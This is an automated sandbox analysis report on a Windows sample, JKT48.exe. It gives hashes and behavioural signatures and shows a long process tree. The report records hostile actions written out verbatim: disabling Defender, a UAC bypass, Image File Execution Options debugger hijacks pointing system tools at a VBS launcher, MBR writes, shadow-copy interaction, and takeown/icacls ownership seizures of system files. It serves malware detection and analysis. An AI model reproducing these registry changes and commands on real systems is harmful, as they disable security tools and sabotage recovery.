Resubmissions
28/03/2025, 14:59 | 250328-sc4wsazjx2 | 10
28/03/2025, 14:53 | 250328-r9rr2sxwbz | 10
27/03/2025, 13:35 | 250327-qvr9laswew | 10

Analysis
max time kernel: 118s
max time network: 119s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 27/03/2025, 13:35

Static task: static1
Behavioral task: behavioral1
  Sample: JKT48.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: JKT48.exe
  Resource: win10v2004-20250314-en

General
Target: JKT48.exe
Size: 8.0MB
MD5: 41f5bac802f5e79dc2ca7a3db25d0001
SHA1: ce56c42cadd2db13edf03c15ce3b11c2cfa00f9e
SHA256: 9b495506295d895825ddf2a45c28f704debc31f28c4943b1a78b75c898a4375d
SHA512: 94705e83ce1b104954be07210ea3648c7403a6dd86ebaf6e884ced1552636b6a05a3b2926415d6c49ff251a675815435e4b2a3c8f816bbbf68c08c3299db99ab
SSDEEP: 196608:PF35AX/ip4e/aS3e+gr80KILDjhoOX9oeqZ8r8swzH0e:d3KX/o4eSTr80xHhJ8s63

Malware Config
Signatures

Modifies Windows Defender DisableAntiSpyware settings
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | JKT48.exe

UAC bypass 3 TTPs 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | JKT48.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.

Disables RegEdit via registry modification 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | JKT48.exe

Disables Task Manager via registry modification

Disables use of System Restore points 1 TTPs

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 32 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe | JKT48.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sfc.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" | JKT48.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trustedinstaller.exe\Debugger = "*/" | JKT48.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" | JKT48.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe | JKT48.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe | JKT48.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" | JKT48.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe | JKT48.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" | JKT48.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" | JKT48.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LogonUI.exe | JKT48.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe | JKT48.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe | JKT48.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe | JKT48.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" | JKT48.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe | JKT48.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | JKT48.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" | JKT48.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sfc.exe | JKT48.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe | JKT48.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" | JKT48.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" | JKT48.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LogonUI.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" | JKT48.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" | JKT48.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe | JKT48.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" | JKT48.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" | JKT48.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipconfig.exe | JKT48.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipconfig.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" | JKT48.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe | JKT48.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trustedinstaller.exe | JKT48.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" | JKT48.exe

Possible privilege escalation attempt 64 IoCs
Modifies file permissions 1 TTPs 64 IoCs
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description | ioc | Process
File opened for modification | \??\PhysicalDrive0 | JKT48.exe

Drops file in System32 directory 29 IoCs
description | ioc | Process
File created | C:\windows\system32\taskmgr.exe | JKT48.exe
File created | C:\windows\syswow64\reg.exe | JKT48.exe
File created | C:\windows\syswow64\taskkill.exe | JKT48.exe
File created | C:\windows\syswow64\rundll32.exe | JKT48.exe
File created | C:\windows\syswow64\taskmgr.exe | JKT48.exe
File created | C:\windows\syswow64\resmon.exe | JKT48.exe
File created | C:\windows\syswow64\sethc.exe | JKT48.exe
File created | C:\windows\system32\cmd.exe | JKT48.exe
File created | C:\windows\system32\perfmon.msc | JKT48.exe
File created | C:\windows\system32\logonui.exe | JKT48.exe
File created | C:\windows\system32\winload.exe | JKT48.exe
File created | C:\windows\syswow64\perfmon.msc | JKT48.exe
File created | C:\windows\system32\msconfig.exe | JKT48.exe
File created | C:\windows\system32\sethc.exe | JKT48.exe
File created | C:\windows\system32\taskkill.exe | JKT48.exe
File created | C:\windows\syswow64\perfmon.exe | JKT48.exe
File created | C:\windows\system32\utilman.exe | JKT48.exe
File created | C:\windows\system32\perfmon.exe | JKT48.exe
File created | C:\windows\system32\sfc.exe | JKT48.exe
File created | C:\windows\syswow64\regedit.exe | JKT48.exe
File created | C:\windows\system32\reg.exe | JKT48.exe
File created | C:\windows\system32\ntoskrnl.exe | JKT48.exe
File created | C:\windows\syswow64\cmd.exe | JKT48.exe
File created | C:\windows\syswow64\sfc.exe | JKT48.exe
File created | C:\windows\system32\resmon.exe | JKT48.exe
File created | C:\windows\system32\rstrui.exe | JKT48.exe
File created | C:\windows\system32\hal.dll | JKT48.exe
File created | C:\windows\system32\rundll32.exe | JKT48.exe
File created | C:\windows\syswow64\utilman.exe | JKT48.exe

Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 2 IoCs
description | ioc | Process
File created | C:\windows\servicing\trustedinstaller.exe | JKT48.exe
File created | C:\windows\regedit.exe | JKT48.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
1664 | vssadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
2644 | JKT48.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
2644 | JKT48.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of SetWindowsHookEx 13 IoCs
pid | Process
2644 | JKT48.exe
Suspicious use of WriteProcessMemory 64 IoCs
System policy modification 1 TTPs 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | JKT48.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.

Processes
"C:\Users\Admin\AppData\Local\Temp\JKT48.exe" (PID:2644)
  - Modifies Windows Defender DisableAntiSpyware settings
  - UAC bypass
  - Disables RegEdit via registry modification
  - Event Triggered Execution: Image File Execution Options Injection
  - Writes to the Master Boot Record (MBR)
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - System policy modification
    "C:\windows\system32\takeown.exe" /f "C:\$Recycle.Bin" /a (PID:2776)
    "C:\windows\system32\icacls.exe" "C:\$Recycle.Bin" /grant Administrators:F (PID:2704)
    "C:\windows\system32\takeown.exe" /f "C:\$Recycle.Bin\S-1-5-21-3063565911-2056067323-3330884624-1000" /a (PID:2752)
    "C:\windows\system32\icacls.exe" "C:\$Recycle.Bin\S-1-5-21-3063565911-2056067323-3330884624-1000" /grant Administrators:F (PID:2592)
    "C:\windows\system32\takeown.exe" /f "C:\Documents and Settings" /a (PID:2560)
    "C:\windows\system32\icacls.exe" "C:\Documents and Settings" /grant Administrators:F (PID:780)
    "C:\windows\system32\takeown.exe" /f "C:\MSOCache" /a (PID:2096)
    "C:\windows\system32\icacls.exe" "C:\MSOCache" /grant Administrators:F (PID:348)
    "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users" /a (PID:1104)
    "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users" /grant Administrators:F (PID:3028)
    "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C" /a (PID:2144)
    "C:\windows\system32\takeown.exe" /f "C:\windows\system32\cmd.exe" /a (PID:332)
      - Suspicious use of AdjustPrivilegeToken
    "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C" /grant Administrators:F (PID:2092)
    "C:\windows\system32\icacls.exe" "C:\windows\system32\cmd.exe" /grant Administrators:F (PID:2344)
    "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ose.exe" /a (PID:1232)
    "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ose.exe" /grant Administrators:F (PID:2528)
    "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C" /a (PID:2640)
    "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C" /grant Administrators:F (PID:1464)
    "C:\windows\system32\takeown.exe" /f "C:\windows\regedit.exe" /a (PID:1972)
      - Suspicious use of AdjustPrivilegeToken
    "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.msi" /a (PID:2184)
    "C:\windows\system32\icacls.exe" "C:\windows\regedit.exe" /grant Administrators:F (PID:2244)
      - Modifies file permissions
    "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.msi" /grant Administrators:F (PID:2932)
    "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C" /a (PID:408)
    "C:\windows\system32\takeown.exe" /f "C:\windows\system32\reg.exe" /a (PID:952)
      - Suspicious use of AdjustPrivilegeToken
    "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C" /grant Administrators:F (PID:1016)
    "C:\windows\system32\icacls.exe" "C:\windows\system32\reg.exe" /grant Administrators:F (PID:1152)
    "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.msi" /a (PID:1952)
      - Modifies file permissions
    "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.msi" /grant Administrators:F (PID:1552)
    "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C" /a (PID:1688)
    "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C" /grant Administrators:F (PID:1620)
    "C:\windows\system32\takeown.exe" /f "C:\windows\system32\taskmgr.exe" /a (PID:2012)
      - Suspicious use of AdjustPrivilegeToken
    "C:\windows\system32\icacls.exe" "C:\windows\system32\taskmgr.exe" /grant Administrators:F (PID:1920)
    "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.msi" /a (PID:1188)
    "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.msi" /grant Administrators:F (PID:1776)
    "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C" /a (PID:1912)
    "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C" /grant Administrators:F (PID:1424)
    "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.msi" /a (PID:2364)
    "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.msi" /grant Administrators:F (PID:2828)
    "C:\windows\system32\takeown.exe" /f "C:\windows\system32\msconfig.exe" /a (PID:2700)
      - Suspicious use of AdjustPrivilegeToken
    "C:\windows\system32\icacls.exe" "C:\windows\system32\msconfig.exe" /grant Administrators:F (PID:2356)
    "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C" /a (PID:2812)
    "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C" /grant Administrators:F (PID:2596)
    "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.msi" /a (PID:780)
    "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.msi" /grant Administrators:F (PID:908)
    "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C" /a (PID:2580)
    "C:\windows\system32\takeown.exe" /f "C:\windows\system32\utilman.exe" /a (PID:1652)
      - Suspicious use of AdjustPrivilegeToken
    "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C" /grant Administrators:F (PID:2340)
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\utilman.exe" /grant Administrators:F2⤵PID:2020
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.msi" /a2⤵PID:1336
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.msi" /grant Administrators:F2⤵
- Modifies file permissions
PID:572
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en" /a2⤵PID:2400
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en" /grant Administrators:F2⤵PID:2104
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\sethc.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.msi" /a2⤵PID:1972
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\sethc.exe" /grant Administrators:F2⤵PID:2184
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.msi" /grant Administrators:F2⤵PID:808
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es" /a2⤵PID:2276
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es" /grant Administrators:F2⤵PID:1700
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.msi" /a2⤵PID:952
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.msi" /grant Administrators:F2⤵PID:2124
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\perfmon.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\perfmon.exe" /grant Administrators:F2⤵PID:2056
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr" /a2⤵PID:1236
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr" /grant Administrators:F2⤵PID:1984
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.msi" /a2⤵PID:2440
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.msi" /grant Administrators:F2⤵PID:1980
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C" /a2⤵PID:1920
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:2844
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\perfmon.msc" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\perfmon.msc" /grant Administrators:F2⤵PID:1616
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.msi" /a2⤵PID:1704
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.msi" /grant Administrators:F2⤵PID:2800
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C" /a2⤵PID:2716
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:2356
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\resmon.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\resmon.exe" /grant Administrators:F2⤵PID:3004
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\OneNoteMUI.msi" /a2⤵PID:3000
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\OneNoteMUI.msi" /grant Administrators:F2⤵PID:1608
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C" /a2⤵PID:2636
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:2160
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveMUI.msi" /a2⤵PID:1396
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveMUI.msi" /grant Administrators:F2⤵PID:1940
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\logonui.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\logonui.exe" /grant Administrators:F2⤵PID:1448
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C" /a2⤵PID:1228
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:1548
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\DW20.EXE" /a2⤵PID:2932
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\DW20.EXE" /grant Administrators:F2⤵PID:332
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033" /a2⤵PID:2184
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033" /grant Administrators:F2⤵PID:2152
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C" /a2⤵PID:1532
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\taskkill.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:1772
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\taskkill.exe" /grant Administrators:F2⤵PID:2124
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUI.msi" /a2⤵PID:2516
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUI.msi" /grant Administrators:F2⤵PID:752
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUISet.msi" /a2⤵PID:1268
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUISet.msi" /grant Administrators:F2⤵PID:2060
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C" /a2⤵PID:2448
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\rundll32.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:1400
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\rundll32.exe" /grant Administrators:F2⤵PID:1728
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\AccessMUISet.msi" /a2⤵PID:1708
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\AccessMUISet.msi" /grant Administrators:F2⤵PID:2980
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us" /a2⤵PID:2264
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us" /grant Administrators:F2⤵PID:2576
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\rstrui.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\AccessMUI.msi" /a2⤵PID:2704
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\rstrui.exe" /grant Administrators:F2⤵PID:2652
-
-
